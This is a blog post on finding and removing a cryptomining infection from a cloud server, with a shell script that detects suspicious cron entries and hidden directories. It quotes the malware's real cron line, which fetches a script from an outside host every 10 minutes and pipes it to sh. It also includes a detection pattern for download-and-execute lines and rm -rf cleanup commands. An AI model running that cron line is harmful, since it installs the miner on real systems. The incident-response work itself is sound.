1. Problem
Early one morning, right after I got up, Alibaba Cloud sent me a text message warning of an urgent server security event: a mining program.
Alibaba Cloud "kindly" offers a fix, but it requires buying the Enterprise Edition of its security service, which goes against my principle of never paying for something I can do with my own hands.
A quick search showed that plenty of people have run into the same thing; these scripts are turning servers into mining "zombies" (bots).
2. Troubleshooting
1) First, use the top command to look at the process consuming the most CPU, bioset, and confirm that it is the so-called mining process.
A reminder picked up from online reports: after a compromise the console output can no longer be trusted, because the malware may redirect, alter or hide what you see. A statically linked busybox can work around this. In my case this did not happen, so I did not need it.
Killing the process only helps for a while; it reappears, which points to a watchdog (daemon) or a scheduled re-sync mechanism.
2) Locate the files by process name
[root@hadoop1 sbin]# find / -name '*bioset*'
/var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/xCkB12/bioset
The same directory holds a script file named proc_1, presumably the watchdog script. Deleting it has no effect (there is also a re-sync mechanism, see below).
3) Query the scheduled tasks with crontab -l. This is the nasty part:
[root@hadoop1 sbin]# crontab -l
*/10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|sh
Every 10 minutes the malware downloads a shell script from djangocc.com and executes it. You cannot simply run crontab -e, delete the entry, save and exit: that does not fix the root cause, because the entry keeps being added back.
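The two manual checks above (crontab -l and the hunt for the hidden directory) are easy to script. The following is an added example, not code from the original post: it flags cron entries that download something and pipe it straight into a shell, and lists dot-prefixed "systemd-private" lookalikes in a temp directory. The function names are my own; the sample crontab and directory tree are constructed here so the script runs offline (the malicious cron line is the one quoted in the post).

```shell
#!/bin/sh
# Added example (not from the original post). Automates the troubleshooting
# checks on constructed data. Function names are my own assumptions.

# Print crontab lines that fetch with curl/wget and pipe the result into sh
# or bash. The post's own entry matches; a wget that merely saves a file
# does not. grep -E exits 1 when nothing matches, so "|| true" keeps the
# function's exit status at 0 for callers running under set -e.
flag_download_and_exec() {
    grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$1" || true
}

# Real PrivateTmp directories are created as systemd-private-<id>-<unit>-<random>
# with no leading dot. A dot-prefixed copy of that name, like the one the
# post found under /var/tmp, is a hiding place worth inspecting.
find_fake_systemd_tmp() {
    find "$1" -mindepth 1 -maxdepth 1 -name '.systemd-private-*' 2>/dev/null
}

count_lines() { wc -l | tr -d ' '; }

# --- constructed sample data so the script runs offline -------------------
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT

# Two benign entries plus the cron line quoted in the post.
cat > "$demo/root.crontab" <<'EOF'
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * wget -q -O /tmp/report.txt http://intranet.example.invalid/report
*/10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|sh
EOF

# A genuine PrivateTmp directory next to a dot-prefixed lookalike.
mkdir -p "$demo/var/tmp/systemd-private-0123abcd-httpd.service-Qx7Yz1" \
         "$demo/var/tmp/.systemd-private-0123abcd-systemd-resolved.service-xCkB12/vje9c1vlq"

echo "== suspicious cron entries =="
flag_download_and_exec "$demo/root.crontab"
echo "== hidden systemd-private lookalikes =="
find_fake_systemd_tmp "$demo/var/tmp"
```

On a real host, run flag_download_and_exec against every crontab, not only root's: the per-user spools under /var/spool/cron, /etc/crontab and the files in /etc/cron.d. The directory check is a heuristic; a hit means "look inside", not "this is malware", so keep the listing for the report.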
3. Problem solving
1) Stop the cron timer
systemctl stop crond # stop the cron daemon
systemctl disable crond.service # stop it from starting at boot
2) Remove the crontab file
rm -rf /var/spool/cron/root
3) Delete the malware files
rm -rf /var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/*
4) Kill the process using the PID seen earlier in top
kill -9 2042
5) Run crontab -e, delete all of its content, then save and exit
crontab -e
6) Check again: top no longer shows bioset and CPU usage is back to normal.
(Also go to the Alibaba Cloud console afterwards and confirm that CPU usage is back to normal.)
Reference:
https://www.sunjs.com/article/detail/62c7ba45975946f89b3a1cd574a4856e.html